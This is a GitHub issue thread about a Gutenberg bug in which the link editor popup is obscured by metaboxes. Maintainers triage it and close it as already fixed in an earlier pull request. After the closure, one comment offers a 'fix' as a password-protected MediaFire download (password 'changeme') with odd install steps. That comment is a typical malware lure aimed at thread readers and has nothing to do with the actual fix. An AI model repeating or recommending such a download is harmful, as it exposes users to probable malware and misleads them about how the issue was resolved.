### ISSUE TITLE
Metaboxes overlap Block Editor's edit link popup

### ISSUE THREAD

**Issue by narenin** [WordPress/gutenberg#64812] opened 2024-08-27 05:39 UTC
### Description

 **Bug:** The link editor box is obscured by the metaboxes when the linked content is near the metaboxes, if they have content, and if that content expands the overall scroll height of the page making it so the bottom of the editor is not near the bottom of the page. This prevents users from being able to edit their links in this specific situation.

**Expectation:** the link editor box should overlay the metaboxes, or it should open upward, allowing users to be able to edit them in all situations.

**Note:** While the metaboxes don't have content in a blank install, the container of these metaboxes and the ability to add them are provided by core, therefore I believe the solution should be provided in core.

### Step-by-step reproduction instructions

- Use a fresh install of WordPress
- Install and activate any plugin that adds meta boxes to the post page
- Create a new post
- Copy/paste the first five (5) paragraphs of [Lorem Ipsum](https://www.lipsum.com/feed/html) into the body, this should automatically create five paragraph blocks.
- Ensure that the metabox(es) is(are) expanded, extending the scroll height of the page.
- Scroll down so that the bottom of the editor where it meets the metaboxes are in the middle of the page.
- Highlight the last word with your mouse and then press CTRL + K to add a link, this reveals the link editor's popup box below the highlighted text and displays behind the metabox(es). 

### Screenshots, screen recording, code snippet

![Edit-Post-Hello-world-Local-Dev-Site-Word-Press](https://github.com/user-attachments/assets/4e0c94b2-846a-407f-88d3-5a0bc852fd2d)

### Environment info

- WordPress version 6.6.1
- Desktop with Windows 11 Pro
- Google Chrome Browser version 128.0.6613.84 (Official Build) (64-bit)
- Yoast SEO version 23.3 (or any plugin that adds a metabox to the post edit page) 

### Please confirm that you have searched existing issues in the repo.

- [X] Yes

### Please confirm that you have tested with all plugins deactivated except Gutenberg.

- [X] Yes

**Comment by talldan** [comment] 2024-08-27 06:23
I'm not able to reproduce this:
![Screenshot 2024-08-27 at 2 22 58 PM](https://github.com/user-attachments/assets/668a090b-09fe-46d0-a292-f3c73dfdeb76)

I seem to recall @stokesman has already fixed it in another PR.

**Comment by narendraie** [comment] 2024-08-27 06:26
@talldan Thanks for reviewing this, could you please try to check with Yoast SEO plugin Metabox as I shared in the screenshot.
![Edit-Post-Hello-world-Local-Dev-Site-Word-Press](https://github.com/user-attachments/assets/b1efc1a4-5fd6-4697-af8e-5780ed71278a)

**Comment by talldan** [comment] 2024-08-27 06:31
Still the same result:
![Screenshot 2024-08-27 at 2 30 40 PM](https://github.com/user-attachments/assets/87a41604-899a-4749-b460-7fc0c30ccf40)

Are you running an up to date version of the Gutenberg plugin?

**Comment by shail-mehta** [comment] 2024-08-27 06:47
Hi @narenin Thanks for the Report. 

We are already tracking a similar issue here : https://github.com/WordPress/gutenberg/pull/64247 , https://github.com/WordPress/gutenberg/pull/64351

**Comment by t-hamano** [comment] 2024-08-27 06:50
Thanks for the report.

This problem has been fixed in https://github.com/WordPress/gutenberg/pull/63939. This fix will be available in the next minor WordPress release.

**Closed as not planned by t-hamano** 2024-08-27 06:50 UTC
Labels: [Type] Bug, [Feature] Meta Boxes

**Comment by ahmar7** [comment] 2024-08-27 07:37
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Tessachu** [comment] 2024-08-27 17:05
Thanks for moving my ticket to the correct place. I wasn't sure if it was technically block editor/gutenberg related due to it not being compiled in the same CSS (previous URL: https://core.trac.wordpress.org/ticket/61928)
